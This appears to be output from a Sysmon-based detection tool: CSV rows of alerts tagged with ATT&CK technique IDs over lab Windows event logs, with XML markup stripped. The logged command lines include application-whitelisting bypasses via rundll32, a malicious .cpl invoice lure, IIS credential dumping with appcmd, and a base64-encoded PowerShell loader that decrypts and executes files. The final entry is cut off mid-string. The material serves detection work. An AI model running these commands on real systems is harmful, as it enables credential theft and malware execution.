netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,FileProtocolHandler calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16391 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:37.063 + 365ABB72-20B1-5CD8-0000-001064D62400 + 1844 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16391 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:37.063 + 365ABB72-20B1-5CD8-0000-001064D62400 + 1844 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557668039.743077,2019-05-12T17:33:59.743077+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,FileProtocolHandler calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16391 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:33:37.063 + 365ABB72-20B1-5CD8-0000-001064D62400 + 1844 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,FileProtocolHandler calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.973148,2019-05-27T05:29:18.973148+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5943 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.933 + 365ABB72-3D6E-5CEB-0000-0010EFADFF00 + 2276 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558969968.76308,2019-05-27T19:12:48.763080+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c vssadmin List Shadows| find "Shadow Copy Volume" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6184 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:48.644 + 365ABB72-FE70-5CEB-0000-0010385C0C00 + 2412 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe /c vssadmin List Shadows| find "Shadow Copy Volume" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-FD85-5CEB-0000-00104C0E0B00 + 1944 + C:\Windows\System32\notepad.exe + "C:\Windows\System32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1564436001.567754,2019-07-30T01:33:21.567754+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 93.184.220.29 ) and port ( 80 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 4908 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + Suspicious NetCon + 2019-07-29 21:33:19.687 + 747F3D96-661E-5D3F-0000-00107F248700 + 3164 + C:\Windows\System32\mshta.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10.home + 49827 + + false + 93.184.220.29 + + 80 + http + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl",)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.445 + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-60F5-5D3F-0000-0010A7B65500 + 4996 + C:\Windows\System32\control.exe + "C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1127] Trusted Developer Utilities,1558632368.94719,2019-05-23T21:26:08.947190+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( \\vboxsrv\HTools\msxsl.exe ) through command line ( msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1017 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-23 17:26:08.686 + 365ABB72-D7B0-5CE6-0000-001077C56D00 + 3388 + \\vboxsrv\HTools\msxsl.exe + 1.1.0.1 + msxsl + Command Line XSLT + Microsoft + msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat + D:\ + IEWIN7\IEUser + 365ABB72-CE6C-5CE6-0000-002047F30000 + 0xf347 + 1 + High + SHA1=8B516E7BE14172E49085C4234C9A53C6EB490A45,MD5=3E9F31B4E2CD423C015D34D63047685E,SHA256=35BA7624F586086F32A01459FCC0AB755B01B49D571618AF456AA49E593734C7,IMPHASH=2477F6A819520981112AD254E2BD87D8 + 365ABB72-D2D4-5CE6-0000-001047EA6400 + 2236 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1599760127.156198,2020-09-10T21:48:47.156198+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 380456 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + - + 2020-09-10 17:48:39.678 + 747F3D96-66F7-5F5A-0500-00000000F600 + 388 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\windows\system32\cmd.exe + c:\windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-66F8-5F5A-E703-000000000000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-66F4-5F5A-0300-00000000F600 + 300 + C:\Windows\System32\smss.exe + \SystemRoot\System32\smss.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.445 + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-60F5-5D3F-0000-0010A7B65500 + 4996 + C:\Windows\System32\control.exe + "C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1564434679.098105,2019-07-30T01:11:19.098105+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4863 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:11:17.445 + 747F3D96-60F5-5D3F-0000-0010D1CF5500 + 4356 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + C:\Users\IEUser\Downloads\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-0020B5314100 + 0x4131b5 + 1 + Medium + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-60F5-5D3F-0000-0010A7B65500 + 4996 + C:\Windows\System32\control.exe + "C:\Windows\System32\control.exe" "C:\Users\IEUser\Downloads\Invoice@0582.cpl", + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557681631.183699,2019-05-12T21:20:31.183699+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16511 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:20:01.964 + 365ABB72-55C1-5CD8-0000-0010970D2F00 + 4092 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-502E-5CD8-0000-00102A330700 + 3192 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16390 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:32:58.167 + 365ABB72-208A-5CD8-0000-0010119B2400 + 3560 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668017.078801,2019-05-12T17:33:37.078801+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16390 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:32:58.167 + 365ABB72-208A-5CD8-0000-0010119B2400 + 3560 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-2006-5CD8-0000-0010E0912300 + 2936 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.893033,2019-05-27T05:29:18.893033+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5940 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.852 + 365ABB72-3D6E-5CEB-0000-00102FAAFF00 + 3304 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "ERROR ( message:Configuration error " /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQAp